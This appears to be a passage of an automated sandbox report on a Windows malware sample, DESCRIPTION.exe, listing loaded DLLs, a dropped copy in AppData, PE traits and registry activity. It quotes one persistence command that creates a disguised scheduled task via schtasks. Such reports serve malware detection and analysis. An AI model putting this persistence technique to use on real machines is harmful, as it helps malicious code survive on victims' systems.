Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: msvbvm60.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: vb6zz.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: winsqlite3.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: vbscript.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: zipfldr.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: msxml3.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: esscli.dll

Source: C:\Users\user\Desktop\DESCRIPTION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\DESCRIPTION.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DESCRIPTION.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DESCRIPTION.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: DESCRIPTION.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: W.pdb4 source: DESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000442000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: joip.pdbSHA256 source: DESCRIPTION.exe, OdoiXyuXnaQN.exe.1.dr
Source:	Binary string: joip.pdb source: DESCRIPTION.exe, OdoiXyuXnaQN.exe.1.dr

Source: DESCRIPTION.exe

Static PE information: 0xE2218AEF [Wed Mar 22 06:57:51 2090 UTC]

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_04B7DF31 push es; ret	1_2_04B7DF40
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_0699D573 push ecx; ret	1_2_0699D574
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_06994260 push es; ret	1_2_06994270
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_0699A260 pushad ; retf	1_2_0699A261
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_0699B082 push eax; iretd	1_2_0699B089
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069CBE50 push eax; iretd	1_2_069CBE51
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561D573 push ecx; ret	10_2_0561D574
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561B082 push eax; iretd	10_2_0561B089
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561A260 pushad ; retf	10_2_0561A261
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F3BE50 push eax; iretd	10_2_06F3BE51
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 16_2_00404B3E push 00000013h; ret	16_2_00404B45

Source: DESCRIPTION.exe	Static PE information: section name: .text entropy: 7.749837441589309
Source: OdoiXyuXnaQN.exe.1.dr	Static PE information: section name: .text entropy: 7.749837441589309

Source: C:\Users\user\Desktop\DESCRIPTION.exe

File created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\DESCRIPTION.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
